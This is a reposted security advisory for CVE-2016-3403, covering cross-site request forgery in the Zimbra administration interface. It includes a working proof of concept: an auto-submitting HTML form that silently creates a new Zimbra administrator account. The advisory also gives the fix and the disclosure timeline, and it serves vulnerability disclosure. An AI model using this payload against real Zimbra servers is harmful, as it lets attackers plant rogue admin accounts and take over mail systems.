Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Zimbra Cross Site Request Forgery

Related Vulnerabilities: CVE-2016-3403  
Publish Date: 13 Jan 2017
Author: Damien Cauquil, Anthony Laou-Hine Tsuei
Source 
                							

                # CVE-2016-3403: Multiple CSRF in Zimbra Administration interface

## Description

Multiple CSRF vulnerabilities have been found in the administration
interface of Zimbra, giving possibilities like adding, modifying and
removing admin accounts.

## Vulnerability

Every forms in the Administration part of Zimbra are vulnerable to CSRF
because of the lack of a CSRF token identifying a valid session. As a
consequence, requests can be forged and played arbitrarily.

**Access Vector**:   remote
**Security Risk**:   low
**Vulnerability**:   CWE-352
**CVSS Base score**: 5.8

## Proof of Concept

```html
<html>
<body>
<form enctype="text/plain" id="trololo"
action="https://192.168.0.171:7071/service/admin/soap/CreateAccountRequest"
method="POST">
    <input name='<soap:Envelope
xmlns:soap="http://www.w3.org/2003/05/soap-envelope"><soap:Header><context
xmlns="urn:zimbra"><userAgent xmlns="" name="DTC"/><session xmlns=""
id="1337"/><format xmlns=""
type="js"/></context></soap:Header><soap:Body><CreateAccountRequest
xmlns="urn:zimbraAdmin"><name xmlns="">itworks@ubuntu.fr</name><password
xmlns="">test1234</password><a xmlns=""
n="zimbraAccountStatus">active</a><a xmlns=""
n="displayName">ItWorks</a><a xmlns="" n'

        value='"sn">itworks</a><a xmlns=""
n="zimbraIsAdminAccount">TRUE</a></CreateAccountRequest></soap:Body></soap:Envelope>'/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```

## Solution

  * Upgrade to version 8.7

## Affected versions

 * All versions previous to 8.7

## Fixes

 * https://bugzilla.zimbra.com/show_bug.cgi?id=100885
 * https://bugzilla.zimbra.com/show_bug.cgi?id=100899

## Timeline (dd/mm/yyyy)

 * 24/02/2016: Issue reported to Zimbra
 * 24/02/2016: Issue aknwoledged
 * 20/06/2016: complete fixes released with version 8.7

## Credits

 * Anthony LAOU-HINE TSUEI, Sysdream (laouhine_anthony -at- hotmail
-dot- fr)
 * Damien CAUQUIL, Sysdream (d.cauquil -at- sysdream -dot- com)
 
 


<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started